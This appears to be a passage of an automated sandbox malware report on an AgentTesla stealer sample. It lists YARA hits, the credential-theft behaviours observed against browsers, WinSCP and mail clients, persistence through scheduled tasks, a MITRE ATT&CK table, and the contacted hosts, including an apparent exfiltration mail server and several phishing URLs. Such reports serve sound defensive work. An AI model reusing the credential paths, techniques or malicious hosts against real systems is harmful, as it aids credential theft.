                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ECXXCuFHUVw.exe.4728ae8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ECXXCuFHUVw.exe.4728ae8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ECXXCuFHUVw.exe.46edac8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.oBMlky3Rkm7h5QK.exe.410cad0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.oBMlky3Rkm7h5QK.exe.4147af0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ECXXCuFHUVw.exe.46edac8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.oBMlky3Rkm7h5QK.exe.410cad0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.oBMlky3Rkm7h5QK.exe.4147af0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2133378984.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3307025913.0000000003348000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2133378984.000000000259C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2104684722.0000000004A32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2131866829.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2155259832.00000000046ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2104684722.000000000410C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3307025913.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: oBMlky3Rkm7h5QK.exe PID: 3544, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1936, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ECXXCuFHUVw.exe PID: 2136, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3636, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ECXXCuFHUVw.exe.4728ae8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ECXXCuFHUVw.exe.4728ae8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ECXXCuFHUVw.exe.46edac8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.oBMlky3Rkm7h5QK.exe.410cad0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.oBMlky3Rkm7h5QK.exe.4147af0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ECXXCuFHUVw.exe.46edac8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.oBMlky3Rkm7h5QK.exe.410cad0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.oBMlky3Rkm7h5QK.exe.4147af0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2133378984.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2104684722.0000000004A32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2131866829.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2155259832.00000000046ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2104684722.000000000410C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3307025913.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: oBMlky3Rkm7h5QK.exe PID: 3544, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1936, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ECXXCuFHUVw.exe PID: 2136, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3636, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ECXXCuFHUVw.exe.4728ae8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ECXXCuFHUVw.exe.4728ae8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ECXXCuFHUVw.exe.46edac8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.oBMlky3Rkm7h5QK.exe.410cad0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.oBMlky3Rkm7h5QK.exe.4147af0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.ECXXCuFHUVw.exe.46edac8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.oBMlky3Rkm7h5QK.exe.410cad0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.oBMlky3Rkm7h5QK.exe.4147af0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2133378984.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3307025913.0000000003348000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2133378984.000000000259C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2104684722.0000000004A32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2131866829.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2155259832.00000000046ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2104684722.000000000410C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3307025913.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: oBMlky3Rkm7h5QK.exe PID: 3544, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1936, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ECXXCuFHUVw.exe PID: 2136, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3636, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		311
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		3
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		211
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Registry Run Keys / Startup Folder                    		12
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object Model1
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets141
                    Virtualization/Sandbox Evasion                    		SSHKeylogging23
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Masquerading                    		DCSync1
                    System Network Configuration Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                    Virtualization/Sandbox Evasion                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                    Hidden Files and Directories                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1417528 Sample: oBMlky3Rkm7h5QK.exe Startdate: 29/03/2024 Architecture: WINDOWS Score: 100 53 mail.pacificindia.com 2->53 55 api.ipify.org 2->55 61 Found malware configuration 2->61 63 Malicious sample detected (through community Yara rule) 2->63 65 Sigma detected: Scheduled temp file as task from temp location 2->65 67 8 other signatures 2->67 8 oBMlky3Rkm7h5QK.exe 7 2->8         started        12 ECXXCuFHUVw.exe 5 2->12         started        14 qZeUnR.exe 2->14         started        16 qZeUnR.exe 2->16         started        signatures3 process4 file5 49 C:\Users\user\AppData\...CXXCuFHUVw.exe, PE32 8->49 dropped 51 C:\Users\user\AppData\Local\...\tmpE1D3.tmp, XML 8->51 dropped 79 Uses schtasks.exe or at.exe to add and modify task schedules 8->79 81 Writes to foreign memory regions 8->81 83 Allocates memory in foreign processes 8->83 85 Adds a directory exclusion to Windows Defender 8->85 18 RegSvcs.exe 16 4 8->18         started        23 powershell.exe 23 8->23         started        25 powershell.exe 23 8->25         started        27 schtasks.exe 1 8->27         started        87 Multi AV Scanner detection for dropped file 12->87 89 Machine Learning detection for dropped file 12->89 91 Injects a PE file into a foreign processes 12->91 29 RegSvcs.exe 12->29         started        31 schtasks.exe 12->31         started        33 conhost.exe 14->33         started        35 conhost.exe 16->35         started        signatures6 process7 dnsIp8 57 mail.pacificindia.com 23.226.124.127, 49705, 49707, 587 WEBAIR-INTERNETUS United States 18->57 59 api.ipify.org 104.26.12.205, 443, 49702, 49706 CLOUDFLARENETUS United States 18->59 47 C:\Users\user\AppData\Roaming\...\qZeUnR.exe, PE32 18->47 dropped 69 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->69 71 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->71 73 Tries to steal Mail credentials (via file / registry access) 18->73 37 conhost.exe 23->37         started        39 WmiPrvSE.exe 23->39         started        41 conhost.exe 25->41         started        43 conhost.exe 27->43         started        75 Tries to harvest and steal browser information (history, passwords, etc) 29->75 77 Hides that the sample has been downloaded from the Internet (zone.identifier) 29->77 45 conhost.exe 31->45         started        file9 signatures10 process11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    oBMlky3Rkm7h5QK.exe68%ReversingLabsByteCode-MSIL.Spyware.Negasteal
                    oBMlky3Rkm7h5QK.exe60%VirustotalBrowse
                    oBMlky3Rkm7h5QK.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe68%ReversingLabsByteCode-MSIL.Spyware.Negasteal
                    C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe69%VirustotalBrowse
                    C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe0%ReversingLabs
                    C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe0%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://mail.pacificindia.com0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ipify.org
                    		104.26.12.205
                    		truefalse
                      		high
                      mail.pacificindia.com
                      		23.226.124.127
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.ipify.orgoBMlky3Rkm7h5QK.exe, 00000000.00000002.2104684722.000000000410C000.00000004.00000800.00020000.00000000.sdmp, oBMlky3Rkm7h5QK.exe, 00000000.00000002.2104684722.0000000004A32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2133378984.0000000002521000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2131866829.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ECXXCuFHUVw.exe, 0000000A.00000002.2155259832.00000000046ED000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3307025913.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://account.dyn.com/oBMlky3Rkm7h5QK.exe, 00000000.00000002.2104684722.000000000410C000.00000004.00000800.00020000.00000000.sdmp, oBMlky3Rkm7h5QK.exe, 00000000.00000002.2104684722.0000000004A32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2131866829.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ECXXCuFHUVw.exe, 0000000A.00000002.2155259832.00000000046ED000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://api.ipify.org/tRegSvcs.exe, 00000009.00000002.2133378984.0000000002521000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3307025913.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameoBMlky3Rkm7h5QK.exe, 00000000.00000002.2104108311.0000000002E2E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2133378984.0000000002521000.00000004.00000800.00020000.00000000.sdmp, ECXXCuFHUVw.exe, 0000000A.00000002.2152988500.000000000340E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3307025913.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://mail.pacificindia.comRegSvcs.exe, 00000009.00000002.2133378984.000000000259C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3307025913.0000000003348000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  104.26.12.205
                                  		api.ipify.orgUnited States
                                  		13335CLOUDFLARENETUSfalse
                                  23.226.124.127
                                  		mail.pacificindia.comUnited States
                                  		27257WEBAIR-INTERNETUStrue

                                  General Information

                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1417528
                                  Start date and time:2024-03-29 15:01:11 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 7m 44s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:23
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:oBMlky3Rkm7h5QK.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@23/19@2/2
                                  EGA Information:
                                  • Successful, ratio: 66.7%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 210
                                  • Number of non-executed functions: 12
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target qZeUnR.exe, PID 5752 because it is empty
                                  • Execution Graph export aborted for target qZeUnR.exe, PID 6596 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  15:01:57API Interceptor1x Sleep call for process: oBMlky3Rkm7h5QK.exe modified
                                  15:02:00Task SchedulerRun new task: ECXXCuFHUVw path: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe
                                  15:02:00API Interceptor44x Sleep call for process: powershell.exe modified
                                  15:02:02API Interceptor1x Sleep call for process: ECXXCuFHUVw.exe modified
                                  15:02:02API Interceptor77x Sleep call for process: RegSvcs.exe modified
                                  15:02:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run qZeUnR C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe
                                  15:02:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run qZeUnR C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  104.26.12.205SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exeGet hashmaliciousBunny LoaderBrowse
                                  • api.ipify.org/
                                  lods.cmdGet hashmaliciousRemcosBrowse
                                  • api.ipify.org/
                                  23.226.124.127ID-Statement_of_Account_s-XXXXX6290-081220232003311731.exeGet hashmaliciousAgentTeslaBrowse
                                    ID-Statement_of_Account_s-XXXXX6290-081220232003311731.exeGet hashmaliciousAgentTeslaBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      api.ipify.orgBL-INVOICE SHIPPING DOCUMENTS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 104.26.13.205
                                      CamScanner.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 172.67.74.152
                                      bhevLCQYD6.exeGet hashmaliciousAgentTeslaBrowse
                                      • 104.26.13.205
                                      TBC#01 Rev.A3 - lnexa.xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 104.26.12.205
                                      DHL_LHER000678175.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 172.67.74.152
                                      SecuriteInfo.com.Win32.PWSX-gen.9732.1319.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 104.26.12.205
                                      ocrev ns.ordine 290520280324.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 172.67.74.152
                                      CANKO DMC IMPORT ENQUIRY.PDF.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 104.26.13.205
                                      Transaction Advice_280324-WS-394-1247.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 172.67.74.152
                                      YPT23-117419 numaral#U0131 Dekont-20240328.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 172.67.74.152

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CLOUDFLARENETUSBL-INVOICE SHIPPING DOCUMENTS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 104.26.13.205
                                      http://bonosbevvy.com/imei2o7jwqr0/73384Get hashmaliciousUnknownBrowse
                                      • 1.1.1.1
                                      https://riversidetwp.orgGet hashmaliciousUnknownBrowse
                                      • 104.18.11.207
                                      CamScanner.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 172.67.74.152
                                      https://emplacing.com/mde/anti.phpGet hashmaliciousHTMLPhisherBrowse
                                      • 104.17.25.14
                                      https://activeonlinemailuelmanagment.com/Mcm9iZXJ0Lm1hcnRpbmpyQGJvYXJzaGVhZC5jb20=Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                      • 104.17.2.184
                                      SecuriteInfo.com.Win64.DropperX-gen.2488.32398.exeGet hashmaliciousUnknownBrowse
                                      • 104.21.95.148
                                      SecuriteInfo.com.Win64.DropperX-gen.2488.32398.exeGet hashmaliciousUnknownBrowse
                                      • 172.67.145.129
                                      dada.exeGet hashmaliciousUnknownBrowse
                                      • 172.64.41.3
                                      bhevLCQYD6.exeGet hashmaliciousAgentTeslaBrowse
                                      • 104.26.13.205
                                      WEBAIR-INTERNETUShttps://attwebupdate.w3spaces.com/Get hashmaliciousUnknownBrowse
                                      • 174.137.133.32
                                      https://www.bsnews.it/2015/01/23/le-citta-piu-brutte-d-italia-brescia-al-nono-posto-in-classificaGet hashmaliciousUnknownBrowse
                                      • 174.137.133.32
                                      https://bafkreiakypngf5p2vusgmzt3htrul7f7hmhpylofrop6cg6waka2djtzz4.ipfs.dweb.link/#katja.lundberg-rand@daiichi-sankyo.euGet hashmaliciousUnknownBrowse
                                      • 174.137.133.32
                                      http://ipfs.ioGet hashmaliciousUnknownBrowse
                                      • 174.137.133.32
                                      https://m-r.pw/ptviaverdeGet hashmaliciousUnknownBrowse
                                      • 174.137.133.49
                                      http://marketplace-item-details-98756222.zya.meGet hashmaliciousHTMLPhisherBrowse
                                      • 174.137.133.49
                                      https://brandequity.economictimes.indiatimes.com/etl.php?url=//zerpcon.com/nxgtnrtn/imgsdoll#ZnJvdGlyb3RpQGFzc25hdC5xYy5jYQ==Get hashmaliciousUnknownBrowse
                                      • 174.137.133.32
                                      https://www.bing.com/search?q=%e8%8f%af%e7%a2%a9+TUF+GAMING+B760M-PLUS+WIFI%e4%b8%bb%e6%a9%9f%e6%9d%bf&cvid=8ed3431d674542bbaed6934068e7242d&gs_lcrp=EgZjaHJvbWUyBggAEEUYOTIGCAEQABhAMgYIAhAAGEAyBggDEAAYQDIGCAQQABhAMgYIBRAAGEAyBggGEAAYQDIGCAcQABhAMgYICBAAGEAyBwgJEEUY_FXSAQgxMDUwajBqNKgCALACAA&PC=U531&FPIG=7973DC1DA237417B95A39D883F2961E8&first=121&FORM=PERE2Get hashmaliciousUnknownBrowse
                                      • 174.137.133.49
                                      https://digitalmissioners.comGet hashmaliciousUnknownBrowse
                                      • 174.137.133.49
